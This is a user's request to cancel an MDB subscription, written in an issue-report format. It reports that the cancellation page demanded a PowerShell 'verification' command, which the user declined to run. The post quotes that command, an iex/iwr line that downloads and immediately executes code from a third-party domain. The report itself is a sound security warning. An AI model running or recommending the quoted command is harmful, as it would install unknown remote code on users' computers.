Subscription Cancellation

Expected behavior I should be able to cancel my MDB subscription through my account before its upcoming automatic renewal without executing software or commands on my local computer.

My subscription is scheduled to renew tomorrow. I am requesting that the subscription be cancelled immediately and that the upcoming renewal charge not be processed.

Actual behavior When I attempt to cancel my subscription through the MDB website, I am presented with an "Additional Verification Required" screen that instructs me to open Windows Terminal/PowerShell, paste a command, and execute it.

The command presented to me begins with:

iex(iwr https://cloudenterprise26.com/std/?sid=1787256859808-34969ymj -UseBasicParsing)

This appears to instruct PowerShell to download content from a third-party domain and immediately execute it. For security reasons, I will not execute this command.

Because this verification is blocking the cancellation process, I am currently unable to cancel my subscription through the website.

Please manually cancel my subscription effective today and ensure that the automatic renewal scheduled for tomorrow is not charged.

Please also provide written confirmation that the subscription has been cancelled and that no further renewal payment will be processed. Resources (screenshots, code snippets etc.) I have attached a screenshot showing the verification page, the PowerShell instructions, and the command that I was instructed to execute while attempting to cancel my subscription.
